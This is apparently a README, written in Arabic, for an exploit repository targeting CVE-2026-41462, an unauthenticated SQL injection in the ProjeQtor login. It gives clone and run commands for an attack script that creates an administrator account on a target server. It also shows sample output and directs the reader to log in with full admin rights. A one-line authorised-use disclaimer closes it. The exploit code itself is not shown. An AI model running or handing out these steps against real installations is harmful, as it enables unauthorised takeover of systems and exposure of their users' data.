
CVE-2026-41462
ثغرة حقن SQL حرجة غير مصادقة في ProjeQtor الإصدار 12.4.3 فما دون
تمثل CVE-2026-41462 ثغرة حقن SQL حرجة غير مصادقة في وظيفة تسجيل الدخول بأداة إدارة المشاريع ProjeQtor.
python3 CVE-2026-41462.py -u http://target.com --create-admin
# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
--username admin123 --password StrongPass2026!
عندما يكون الاستغلال ناجحًا، سترى مخرجات مشابهة لهذه:
[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php
افتح متصفحك وانتقل إلى:
http://target.com/login.php
سجّل الدخول باستخدام بيانات الاعتماد الظاهرة في مخرجات السكربت.
إذا نجح الأمر، ستصل إلى لوحة تحكم ProjeQtor الإدارية بصلاحيات إدارية كاملة.
مؤشرات النجاح:
| الملف | الوصف |
|---|---|
CVE-2026-41462.py | السكربت الرئيسي للاستغلال |
CVE-2026-41462.yaml | قالب كشف Nuclei |
README.md | هذه الوثائق |
استنسخ المستودع:
git clone https://github.com/0xBlackash/CVE-2026-41462.git
cd CVE-2026-41462
شغّل الاستغلال:
python3 CVE-2026-41462.py -u http://target.com --create-admin
سجّل الدخول بحساب المدير المُنشأ حديثًا.
هذه الأداة مخصّصة للأغراض التعليمية واختبار الاختراق المصرّح به فقط. الاستخدام غير المصرّح به غير قانوني.